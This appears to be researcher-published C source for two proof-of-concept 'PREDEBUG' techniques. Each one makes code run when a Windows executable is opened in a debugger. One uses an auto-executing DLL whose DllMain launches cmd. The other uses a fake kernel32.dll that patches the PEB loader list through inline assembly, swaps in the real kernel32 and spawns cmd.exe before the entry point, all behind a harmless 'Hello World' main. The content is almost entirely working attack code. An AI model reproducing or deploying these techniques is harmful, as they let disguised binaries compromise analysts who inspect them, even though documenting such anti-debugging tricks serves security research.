/* 
-------------------------------------------------------------------------
- PREDEBUG 1 - The Autoexecute DLL [ DLL PART ] 
- 
- Sample showing code execution upon loading in a debugger 
- PREDEBUG loads its own dll that has initialization code 
- This code will be executed before control is passed back 
- to the debugger 
- 
- brett.moore@security-assessment.com 
-------------------------------------------------------------------------
*/ 
#include "stdafx.h" 
#include "process.h" 
extern "C" int __declspec(dllexport) myfunc(void); 
int myfunc(); 
int myfunc() 
{ 
return TRUE; 
} 
BOOL APIENTRY DllMain( HANDLE hModule, 
DWORD ul_reason_for_call, 
LPVOID lpReserved 
) 
{ 
system("cmd"); 
return TRUE; 
} 

/* 
-------------------------------------------------------------------------
- PREDEBUG 2 - The Kernel32 DLL Replacement 
- 
- Sample showing code execution upon loading in a debugger 
- PREDEBUG loads its own copy of kernel32 which alters the 
- entry address, removes the copy and loads the real 
- kernel32.dll 
- 
- When compiled and loaded into a debugger, this code will 
- cause a cmd.exe shell to be started before the executables
- entry point is reached. 
- 
- Needs to be compiled without optimisation 
- 
- brett.moore@security-assessment.com 
-------------------------------------------------------------------------
*/ 
#define _WIN32_WINNT 0x501 
#include <stdio.h> 
#include <windows.h> 
// Included From winternl.h 
typedef struct _UNICODE_STRING { 
USHORT Length; 
USHORT MaximumLength; 
PWSTR Buffer; 
} UNICODE_STRING; 
typedef UNICODE_STRING *PUNICODE_STRING; 
VOID (__stdcall *LdrLoadDl)( 
IN PWCHAR PathToFile OPTIONAL, 
IN ULONG Flags OPTIONAL, 
IN PUNICODE_STRING ModuleFileName, 
OUT PHANDLE ModuleHandle ); 
VOID (__stdcall *LdrUnloadDll)( 
HINSTANCE pInstance 
); 
VOID (__stdcall *RtlInitUnicodeString)( 
IN OUT PUNICODE_STRING DestinationString, 
IN PCWSTR SourceString 
); 

void predebug() 
{ 
HMODULE hMod; 
UNICODE_STRING nString; 
STARTUPINFO si; 
PROCESS_INFORMATION pi; 
// Grab the API addresses we require 
hMod = GetModuleHandle("ntdll.dll"); 
LdrLoadDl = (void *) GetProcAddress(hMod, "LdrLoadDll"); 
LdrUnloadDll = (void *) GetProcAddress(hMod, "LdrUnloadDll"); 
RtlInitUnicodeString = (void *) GetProcAddress( 
hMod,"RtlInitUnicodeString"); 
// Init the unicode string 
RtlInitUnicodeString(&nString,L"kernel32.dll"); 
// Removes the 'system dll' check 
_asm{ 
mov esi,fs:0x30 // Get Peb 
add esi,0x0c // Move to PPROCESS_MODULE_INFO 
lodsd // Get the pointer into EAX 
mov esi,[eax + 0x1c] // InInitializationOrderModuleList 
lodsd // Grab Next Pointer in eax 
mov word ptr [eax+0x28],01 // Overwrite the 'load count' 
} 
// Get the address of our dll 
hMod = GetModuleHandle("predebug.dll"); 
// Unload it 
LdrUnloadDll(hMod); 
// Load the real kernel32.dll 
LdrLoadDl(NULL,NULL,&nString,&hMod); 
// We are now in a state where we can execute code normally 
GetStartupInfo(&si); 
CreateProcess("c:\\winnt\\system32\\cmd.exe", NULL, NULL, 
NULL, TRUE,CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); 
ExitProcess(1); 
} 

int main(int argc, char *argv[]) 
{ 
printf("Hello World....\n"); 
}